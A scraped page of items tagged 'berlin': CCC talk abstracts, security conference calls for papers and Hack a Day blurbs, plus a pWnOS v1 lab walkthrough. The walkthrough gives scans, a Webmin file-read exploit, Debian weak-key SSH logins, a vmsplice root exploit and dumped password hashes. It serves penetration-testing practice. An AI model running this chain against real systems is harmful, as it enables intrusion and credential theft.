«
Expand/Collapse
22 items tagged "berlin"
Related tags:
germany [+],
chaos communication congress [+],
chaos communication camp [+],
berlin germany [+],
europe [+],
conference [+],
vulnerability [+],
verkehrsbetriebe berlin [+],
verkehrsbetriebe [+],
testing [+],
sql injection [+],
sql [+],
posttest [+],
magichash [+],
injection [+],
hash collision [+],
hacks [+],
collision [+],
wsis [+],
vulnerability assessment [+],
society [+],
ralf bendrath [+],
participation [+],
paris [+],
papers [+],
openbeacon [+],
network [+],
markus beckedahl [+],
keyboard sniffers [+],
ism band [+],
hacker conference [+],
group [+],
ghz [+],
georg greve [+],
dimva [+],
device [+],
computer network defense [+],
computer [+],
communication [+],
chip [+],
chaos computer club [+],
chaos [+],
call for papers [+],
applied network [+],
water wheel [+],
water powered [+],
valentin [+],
txt [+],
ssh [+],
segment display [+],
segment [+],
revolution [+],
read [+],
quot [+],
penetration test [+],
november 22nd [+],
niklas roy [+],
niklas [+],
nbsp [+],
musical [+],
music [+],
museum [+],
misc [+],
machine [+],
logo generator [+],
jeffrey paul tags [+],
jeffrey paul [+],
heorot [+],
generator [+],
gamesec [+],
game theory [+],
foam letter [+],
foam [+],
flourescent tubes [+],
financing [+],
electronic currency [+],
electricity [+],
display [+],
digital currencies [+],
classic [+],
cfp [+],
blip tv [+],
bitcoin [+],
array [+],
alabama [+],
air bubble [+],
Howto [+],
BackTrack [+]
-
-
11:26
»
SecDocs
Authors:
Markus Beckedahl Ralf Bendrath Tags:
social Event:
Chaos Communication Camp 2003 Abstract: The World Summit on the Information Society (WSIS) is the latest in a long series of world summits organized by the United Nations that deal with central questions of humanity like the environment, women‚s rights, development, climate change, etc. At the WSIS, information and communication are on the agenda for the first time. The world summit is supposed to develop a common understanding of the information society. In Germany, a WSIS working group initiated by the Network New Media has been meeting continuously since summer 2002. The group has debated the themes of the WSIS, developed civil society positions and planned own interventions. Since January 2003, three open meetings of this working group with members of other non-governmental organizations, alternative media and scientific institutions have been held in Berlin. The working group was expanded and officially established as the "German Civil Society Coordinating Group for WSIS". Delegates of the group have attended important European and world-wide preparatory conferences. They monitor the developments and try to influence the agenda in favor of civil society demands. Single members of the working group are engaged in the sub-committees and caucuses of the international Civil Society Plenary Coordination Group. For the worldwide preparatory meeting in Paris in July, the group sent Georg Greve, President of the Free Software Foundation, Europe, as a civil society delegate into the German governmental delegation. Other members of the group are involved in the counter and alternative summit activities that are currently being planned by media and computer activists, such as the Polymedia lab or the World Forum on Communication Rights. In this panel at the ccc-camp we want to talk about and discuss the topics of the WSIS. What is going on globally and which positions do the different Players like governments, civil society and business have? What are the positions, campains and activities of the global civil society? What is happening especially in Germany? How can civil society use the attention while the WSIS is going on to transport alternative topics like freedoms of information, free software and human rights in the information society?
-
11:24
»
SecDocs
Authors:
Markus Beckedahl Ralf Bendrath Tags:
social Event:
Chaos Communication Camp 2003 Abstract: The World Summit on the Information Society (WSIS) is the latest in a long series of world summits organized by the United Nations that deal with central questions of humanity like the environment, women‚s rights, development, climate change, etc. At the WSIS, information and communication are on the agenda for the first time. The world summit is supposed to develop a common understanding of the information society. In Germany, a WSIS working group initiated by the Network New Media has been meeting continuously since summer 2002. The group has debated the themes of the WSIS, developed civil society positions and planned own interventions. Since January 2003, three open meetings of this working group with members of other non-governmental organizations, alternative media and scientific institutions have been held in Berlin. The working group was expanded and officially established as the "German Civil Society Coordinating Group for WSIS". Delegates of the group have attended important European and world-wide preparatory conferences. They monitor the developments and try to influence the agenda in favor of civil society demands. Single members of the working group are engaged in the sub-committees and caucuses of the international Civil Society Plenary Coordination Group. For the worldwide preparatory meeting in Paris in July, the group sent Georg Greve, President of the Free Software Foundation, Europe, as a civil society delegate into the German governmental delegation. Other members of the group are involved in the counter and alternative summit activities that are currently being planned by media and computer activists, such as the Polymedia lab or the World Forum on Communication Rights. In this panel at the ccc-camp we want to talk about and discuss the topics of the WSIS. What is going on globally and which positions do the different Players like governments, civil society and business have? What are the positions, campains and activities of the global civil society? What is happening especially in Germany? How can civil society use the attention while the WSIS is going on to transport alternative topics like freedoms of information, free software and human rights in the information society?
-
-
8:35
»
Packet Storm Security Recent Files
Call For Papers for DIMVA 2013, the 10th International Conference on Detection of Intrusions and Malware and Vulnerability Assessment. This conference will be held from July 18th through the 19th, 2013 in Berlin, Germany.
-
8:35
»
Packet Storm Security Misc. Files
Call For Papers for DIMVA 2013, the 10th International Conference on Detection of Intrusions and Malware and Vulnerability Assessment. This conference will be held from July 18th through the 19th, 2013 in Berlin, Germany.
-
-
21:56
»
SecDocs
Authors:
Milosch Meriac Tags:
embedded Event:
Chaos Communication Camp 2007 Abstract: We want to empower users to use their Sputnik badges after the camp for all kinds of uses - as wireless keyboard sniffers, remote controls, door security systems, for art performances, intelligence applications and Smart Dust meshing systems. This talk provides a deep insight into OpenBeacon and Sputnik hardware, firmware and protocols of used. It will show how to create custom low cost 2.4GHz nodes based on this technology. The OpenBeacon platform is a project that is dedicated to provide very low cost communication hardware for 2.4GHz ISM band enabled devices for all kinds of uses. The Sputnik device - the first incarnation of OpenBeacon - is a small active 2.4GHz real-time tracking device, whose signal is picked up by the 30+ OpenBeacon base stations installed in the event venue. We just finished a new memory-stick-sized meshing node hardware design around the 32 bit ARM7 AT91SAM7S128 Microcontroller and the nRF24L01 2.4GHz frontend with GPL'ed firmware to enable users to create low cost wireless nodes based on their own firmware. No special hardware or compilers are needed to reprogram the device - the free gcc ARM crosscompiler toolchain is supported. The device can be reprogrammed and powered over USB. It also supports stand alone applications by using a battery pack. To allow a high range it provides a RP-SMA connector and a full size rubber antenna. The OpenBeacon tag - as used for tracking 900 people on the 23rd Chaos Comminucation Congress in Berlin - is a free design for an active RFID device which operates in the 2.4GHz ISM band. OpenBeacon is designed as a transceiver device and therefore both transmits and receives radio waves. The intention of this device is to offer a wide range of use cases such as visitor or item tracking and wireless remote controls with a free self-contained and low-cost RFID design. The OpenBeacon tag hardware is based on a PCB antenna connected to a Nordic Semiconductors 2.4GHz RF Chip (NRF24L01) and is controlled via a dedicated microcontroller (MicroChip PIC16F684). The 8-Bit RISC CPU with special low-power features provides the opportunity to implement a very sleek and power saving transmit design at minimal costs. The device is powered with one CR2032 coin cell and is expected to run for up to several months without changing battery. The OpenBeacon design offers an additional watch quartz for better time and delay reliability to support anticollosion and meshing protocols. A LED output and a touch sensor input is provided for interaction purposes. The transmitting range of the OpenBeacon tag depends on local conditions and is tested indoor within 10 meters through two dry walls or up to 30 meters under optimal line-of-sight conditions. To track OpenBeacon on this venue, the device signals are received by Ethernet based RFID reader base stations. The current base station design provides three switched 10/100 Ethernet ports (switched) and is powered over Ethernet (fully IEEE 802.3af compliant).
-
21:56
»
SecDocs
Authors:
Milosch Meriac Tags:
embedded Event:
Chaos Communication Camp 2007 Abstract: We want to empower users to use their Sputnik badges after the camp for all kinds of uses - as wireless keyboard sniffers, remote controls, door security systems, for art performances, intelligence applications and Smart Dust meshing systems. This talk provides a deep insight into OpenBeacon and Sputnik hardware, firmware and protocols of used. It will show how to create custom low cost 2.4GHz nodes based on this technology. The OpenBeacon platform is a project that is dedicated to provide very low cost communication hardware for 2.4GHz ISM band enabled devices for all kinds of uses. The Sputnik device - the first incarnation of OpenBeacon - is a small active 2.4GHz real-time tracking device, whose signal is picked up by the 30+ OpenBeacon base stations installed in the event venue. We just finished a new memory-stick-sized meshing node hardware design around the 32 bit ARM7 AT91SAM7S128 Microcontroller and the nRF24L01 2.4GHz frontend with GPL'ed firmware to enable users to create low cost wireless nodes based on their own firmware. No special hardware or compilers are needed to reprogram the device - the free gcc ARM crosscompiler toolchain is supported. The device can be reprogrammed and powered over USB. It also supports stand alone applications by using a battery pack. To allow a high range it provides a RP-SMA connector and a full size rubber antenna. The OpenBeacon tag - as used for tracking 900 people on the 23rd Chaos Comminucation Congress in Berlin - is a free design for an active RFID device which operates in the 2.4GHz ISM band. OpenBeacon is designed as a transceiver device and therefore both transmits and receives radio waves. The intention of this device is to offer a wide range of use cases such as visitor or item tracking and wireless remote controls with a free self-contained and low-cost RFID design. The OpenBeacon tag hardware is based on a PCB antenna connected to a Nordic Semiconductors 2.4GHz RF Chip (NRF24L01) and is controlled via a dedicated microcontroller (MicroChip PIC16F684). The 8-Bit RISC CPU with special low-power features provides the opportunity to implement a very sleek and power saving transmit design at minimal costs. The device is powered with one CR2032 coin cell and is expected to run for up to several months without changing battery. The OpenBeacon design offers an additional watch quartz for better time and delay reliability to support anticollosion and meshing protocols. A LED output and a touch sensor input is provided for interaction purposes. The transmitting range of the OpenBeacon tag depends on local conditions and is tested indoor within 10 meters through two dry walls or up to 30 meters under optimal line-of-sight conditions. To track OpenBeacon on this venue, the device signals are received by Ethernet based RFID reader base stations. The current base station design provides three switched 10/100 Ethernet ports (switched) and is powered over Ethernet (fully IEEE 802.3af compliant).
-
-
21:47
»
SecDocs
Authors:
Jeffrey Paul Tags:
bank economy Event:
Chaos Communication Camp 2011 Abstract: Financing The Revolution is a discussion about digital currencies with a particular emphasis on Bitcoin, a new distributed peer-to-peer electronic currency. Digital cash and Bitcoin in particular have caused many new and interesting markets to appear, and these are examined as well as the link between economic freedom and the expression of other basic rights. Keywords: digital cash, cryptography, bitcoin, dgc, darknets, markets, civil liberties Financing The Revolution is a discussion about digital currencies with a particular emphasis on Bitcoin, a new distributed peer-to-peer electronic currency. Digital cash and Bitcoin in particular have caused many new and interesting markets to appear, and these are examined as well as the link between economic freedom and the expression of other basic rights. Jeffrey Paul is a American hacker and entrepreneur currently based in Berlin. Founder of datavibe.net (1999) and EEQJ (2009), he writes, presents, and consults on a wide range of topics including civil liberties and practical applications of networking, cryptography, and security systems.
-
-
20:30
»
Packet Storm Security Recent Files
PostTest is a jar file that will send POST requests to servers in order to test for the hash collision vulnerability discussed at the Chaos Communication Congress in Berlin.
-
20:30
»
Packet Storm Security Tools
PostTest is a jar file that will send POST requests to servers in order to test for the hash collision vulnerability discussed at the Chaos Communication Congress in Berlin.
-
20:30
»
Packet Storm Security Misc. Files
PostTest is a jar file that will send POST requests to servers in order to test for the hash collision vulnerability discussed at the Chaos Communication Congress in Berlin.
-
-
21:41
»
Packet Storm Security Recent Files
Call for participation for the 28C3 Chaos Communication Congress. The Chaos Communication Congress is the annual four-day conference organized by the Chaos Computer Club (CCC) in Berlin, Germany. First held in 1984, it has since established itself as "The European Hacker Conference" attracting a diverse audience of thousands of hackers, scientists, artists, and utopists from all around the world. It will be held from December 27th through the 30th, 2011.
-
21:41
»
Packet Storm Security Misc. Files
Call for participation for the 28C3 Chaos Communication Congress. The Chaos Communication Congress is the annual four-day conference organized by the Chaos Computer Club (CCC) in Berlin, Germany. First held in 1984, it has since established itself as "The European Hacker Conference" attracting a diverse audience of thousands of hackers, scientists, artists, and utopists from all around the world. It will be held from December 27th through the 30th, 2011.
-
-
11:01
»
Hack a Day
[Niklas Roy] is rolling out some water-powered music for Berlin’s Museum night. It seems that this water-wheel is attached to the side of the Museum. It’s got a stream flowing past it and the wheel is constantly turning. The thing is, that work isn’t being used for anything. Now we’ve already seen [Niklas] making electricity [...]
-
-
10:17
»
Hack a Day
Check out this floating foam letter machine that was shown off at last year’s IFA show in Berlin, the German equivalent of CES. The contraption is called Flogos, and comes from a company named SnowMasters based out of Alabama. The Flogos machine consists of a helium and compressed air bubble generator positioned below a custom [...]
-
-
3:01
»
remote-exploit & backtrack
Links
Watch on-line: http://g0tmi1k.blip.tv/file/3388825
Download: http://www.mediafire.com/?5gggmmmycjm
Commands:
http://pastebin.com/2Eq1zG88
What is this?
This is my walk though of how I broke into pWnOS v1.
pWnOS is on a "VM Image", that creates a target on which to practice penetration testing; with the "end goal" is to get root. It was designed to practice using exploits, with multiple entry points
Scenario
A company dedicated to serving Webhosting hires you to perform a penetration test on one of its servers dedicated to the administration of their systems.
It's a linux virtual machine intentionally configured with exploitable services to provide you with a path to r00t. :)
What do I need?
> BackTrack 4 (Final)
> pWnOS.vmdk
> exploit-db.com or milw0rm.
Software
Name: pWnOS
Version: 1
Home Page:
http://0dayclub.com/files/pWnOS%20v1.0.zip
Download Link:
Forum/Support:
http://forums.heorot.net/viewforum.php?f=21
Commands:
Code:
nmap 192.168.3.1-255
nmap -sV -sS -O 192.168.3.100
firefox http://192.168.3.100
firefox http://192.168.3.100:10000
firefox -> milw0rm/explo.it -> search "Webmin" -> save. Filename: webmin.pl/php
*Webmin <> save. Filename: shadow
firefox -> milw0rm/explo.it -> search "Debian OpenSSL" -> save. Filename: ssh.py/rb
*Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit*
http://milw0rm.com/exploits/5622 (perl)
http://milw0rm.com/exploits/5720 (python)
http://milw0rm.com/exploits/5632 (ruby)
http://www.exploit-db.com/exploits/5622 (perl)
http://www.exploit-db.com/exploits/5720 (python)
http://www.exploit-db.com/exploits/5632 (ruby)
wget http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2
perl webmin.pl 192.168.3.100 10000 /home/vmware/.ssh/authorized_keys
perl webmin.pl 192.168.3.100 10000 /home/obama/.ssh/authorized_keys
perl webmin.pl 192.168.3.100 10000 /home/osama/.ssh/authorized_keys
perl webmin.pl 192.168.3.100 10000 /home/yomama/.ssh/authorized_keys
tar jxvf debian_ssh_rsa_2048_x86.tar.bz
cd rsa/2048
grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEAzASM/LKs+FLB7zfmy14qQJUrsQsEOo9FNkoilHAgvQuiE5Wy9DwYVfLrkkcDB2uubtMzGw9hl3smD/OwUyXc/lNED7MNLS8JvehZbMJv1GkkMHvv1Vfcs6FVnBIfPBz0OqFrEGf+a4JEc/eF2R6nIJDIgnjBVeNcQaIM3NOr1rYPzgDwAH/yWoKfzNv5zeMUkMZ7OVC54AovoSujQC/VRdKzGRhhLQmyFVMH9v19UrLgJB6otLcr3d8/uAB2ypTw+LmuIPe9zqrMwxskdfY4Sth2rl6D3bq6Fwca+pYh++phOyKeDPYkBi3hx6R3b3ETZlNCLJjG7+t7kwFdF02Iuw rsa/2048/*.pub
grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEAxRuWHhMPelB60JctxC6BDxjqQXggf0ptx2wrcAw09HayPxMnKv+BFiGA/I1yXn5EqUfuLSDcTwiIeVSvqJl3NNI5HQUUc6KGlwrhCW464ksARX2ZAp9+6Yu7DphKZmtF5QsWaiJc7oV5il89zltwBDqR362AH49m8/3OcZp4XJqEAOlVWeT5/jikmke834CyTMlIcyPL85LpFw2aXQCJQIzvkCHJAfwTpwJTugGMB5Ng73omS82Q3ErbOhTSa5iBuE86SEkyyotEBUObgWU3QW6ZMWM0Rd9ErIgvps1r/qpteMMrgieSUKlF/LaeMezSXXkZrn0x+A2bKsw9GwMetQ rsa/2048/*.pub
*scans for the public key...*
ssh -i dcbe2a56e8cdea6d17495f6648329ee2-4679 obama@192.168.3.100
exit
ssh -i d8629ce6dc8f2492e1454c13f46adb26-4566 vmware@192.168.3.100
hostname
uname -a
firefox -> milw0rm/explo.it -> search "Linux Kernel 2.6" -> save. Filename: vmsplice.c
*Linux Kernel 2.6.17 - 2.6.24.1 vmsplice Local Root Exploit*
http://milw0rm.com/exploits/5092 (c)
http://www.exploit-db.com/exploits/5092 (c)
nano vmsplice.c
gcc vmsplice.c -o vmsplice
./vmsplice
whoami
----------------------------------------------------------------------------------------------------
Users
root: root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
vmware: vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama: obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama: osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama: yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::
----------------------------------------------------------------------------------------------------
Notes:
I had problems with the Debian OpenSSH/OpenSSL exploit, some times it would work, else it would be really slow or just cant find the correct exploit file. The method which I use, turns it into a offline attack, which makes it more stealthy as it will not log failed logins (e.g. /var/auth/auth.log. See
here for reading it). It relies on the default path tho!
This is one method of getting in, the author did say that there is multiple ways in!
It took me a bit of work to also to get it to work with virtual box & static IP addresses.
Read my post
here (short answer - need configure another interface via another OS)
Song: Deadmau5 - Faxing Berlin
Video length: 07:37
Capture length: 14:55
Blog Post:
http://g0tmi1k.blogspot.com/2010/04/video-pwnos.html
Forum Post:
http://forums.heorot.net/viewtopic.php?f=21&t=391&p=1956#p1956 or
http://www.backtrack-linux.org/forums/backtrack-videos/2748-%5Bvideo%5D-attacking-pwnos.html#post9217
~g0tmi1k
-
-
18:00
»
Packet Storm Security Misc. Files
GameSec 2010 Call For Papers - This is conference on decision and game theory for security. It will take place in Berlin, Germany November 22nd through the 23rd, 2010.
-
-
13:56
»
Packet Storm Security Misc. Files
Call For Papers for EC2ND - The sixth European Conference on Computer Network Defense (EC2ND) will be held at the Faculty of Electrical Engineering and Computer Science at Berlin Institute of Technology (TU Berlin). The conference brings together researchers from academia and industry within Europe and beyond to present and discuss current topics in applied network and systems security. It will occur from October 28th through the 29th, 2010 in Berlin, Germany.
-
13:56
»
Packet Storm Security Recent Files
Call For Papers for EC2ND - The sixth European Conference on Computer Network Defense (EC2ND) will be held at the Faculty of Electrical Engineering and Computer Science at Berlin Institute of Technology (TU Berlin). The conference brings together researchers from academia and industry within Europe and beyond to present and discuss current topics in applied network and systems security. It will occur from October 28th through the 29th, 2010 in Berlin, Germany.
-
-
7:40
»
Hack a Day
This is an array of flourescent tubes that form a display. The video above is just two modules of a ten module installation that [Valentin] and his team are showing at an exhibition in Berlin tomorrow. The connected modules form something of a scrolling 16-segment display (similar to the 17 segment display modules of the [...]